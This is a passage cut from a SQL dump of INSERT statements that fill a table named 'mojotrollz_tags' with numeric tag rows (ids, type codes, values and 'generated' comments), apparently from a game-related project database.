`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7768, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7769, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7770, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7770, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7771, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7771, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7772, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7772, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7773, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7773, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7774, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7774, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7775, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7775, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7776, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7777, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7777, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7778, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7779, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7780, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7783, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7784, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7788, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7789, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7790, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7790, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7790, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7790, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7790, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7790, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7791, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7792, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7792, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7792, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7792, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7792, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7792, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7793, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7793, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7793, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7793, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7793, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7793, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7794, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7794, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7795, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7795, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7795, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7796, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7797, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7797, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7797, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7798, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7798, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7799, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7800, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7800, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7800, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7801, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7801, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7802, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7802, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7803, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7804, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7804, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7805, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7806, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7807, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7807, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7808, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7809, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7823, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7823, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7824, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7824, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7825, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7825, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7825, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7825, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7825, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7826, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7826, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7843, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7844, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7845, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7846, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7846, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7847, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7847, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7848, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7849, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7849, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7849, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7850, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7850, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7850, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7851, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7851, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7852, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7852, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7853, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7853, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7854, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7854, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7855, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7855, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7856, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7857, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7857, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7858, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7858, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7863, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7864, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7864, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7865, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7865, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7866, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7866, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7867, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7867, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7868, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7868, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7869, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7869, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7870, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7870, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7871, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7871, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7872, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7872, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7873, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7873, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7874, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7874, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7875, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7875, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7876, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7877, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7878, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7879, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7880, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7881, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7882, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7882, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7883, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7884, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7885, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7885, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7886, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7895, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7895, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7897, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7897, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7897, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7898, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7899, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7900, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7900, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7902, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7903, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7903, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7904, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7904, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7907, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7907, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7916, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7917, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7936, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7937, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7937, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7939, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7939, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7940, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7940, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7941, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7942, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7942, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7943, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7944, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7945, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7945, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7946, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7947, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7947, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7948, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7948, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7949, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7949, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7950, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7951, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7951, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7951, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7951, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7951, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7952, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7952, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7953, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7953, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7953, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7954, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7954, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7955, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7955, 1, 30, 0, 